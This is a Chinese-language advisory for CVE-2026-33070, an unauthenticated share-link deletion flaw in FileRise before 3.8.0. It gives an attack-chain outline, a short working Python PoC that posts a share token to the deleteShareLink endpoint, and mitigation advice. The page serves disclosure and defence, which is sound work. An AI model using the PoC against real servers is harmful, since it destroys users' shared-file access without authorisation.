CVE-2026-33070 CVSS 3.7 低危

CVE-2026-33070 FileRise未授权删除分享链接漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33070

漏洞类型

权限绕过

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FileRise

漏洞概述

FileRise自托管文件管理器在3.8.0之前的版本中存在严重的身份验证缺失漏洞。由于`deleteShareLink`端点未进行权限校验，未经身份认证的攻击者可利用已知的分享令牌，恶意删除任意文件分享链接。此攻击将导致合法用户无法通过链接访问文件，构成拒绝服务风险。厂商已在3.8.0版本中修复了该问题。

技术细节

该漏洞源于FileRise后端代码在实现`FileController::deleteShareLink()`功能时的设计缺陷。具体而言，`POST /api/file/deleteShareLink.php`接口在接收删除请求时，完全绕过了用户身份验证、权限授权检查以及CSRF令牌验证机制。这意味着系统默认信任所有发往该端点的请求。攻击者无需登录账户或拥有管理员权限，仅需构造包含目标分享Token的HTTP POST请求发送至该接口，服务器即会信任并执行删除操作。这种逻辑漏洞使得任何匿名网络用户均可破坏系统的文件分享功能，导致共享链接被非预期删除，从而造成资源访问的完整性破坏和可用性中断，对业务造成严重影响。

攻击链分析

STEP 1

信息收集

攻击者识别出目标站点使用的是FileRise，且版本低于3.8.0。

STEP 2

获取令牌

攻击者通过社交工程、信息泄露或其他方式获取到有效的文件分享Token。

STEP 3

发送恶意请求

攻击者向`/api/file/deleteShareLink.php`发送包含该Token的POST请求。

STEP 4

达成攻击

服务器由于未验证身份，直接删除了对应的分享链接，导致其他用户无法访问该文件。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def delete_share_link(target_url, share_token):
    """
    Exploit for CVE-2026-33070
    Deletes a share link without authentication.
    """
    # The vulnerable endpoint
    endpoint = f"{target_url}/api/file/deleteShareLink.php"
    
    # Payload containing the share token
    payload = {
        "token": share_token
    }
    
    try:
        response = requests.post(endpoint, data=payload)
        if response.status_code == 200:
            print(f"[+] Successfully deleted share link with token: {share_token}")
        else:
            print(f"[-] Failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://localhost"
    token = "example_share_token_123"
    delete_share_link(target, token)

影响范围

FileRise < 3.8.0

防御指南

临时缓解措施

若无法立即升级，应在防火墙或反向代理层面限制对`/api/file/deleteShareLink.php`接口的访问，仅允许内网或已认证IP调用。或者暂时禁用文件分享功能以规避风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表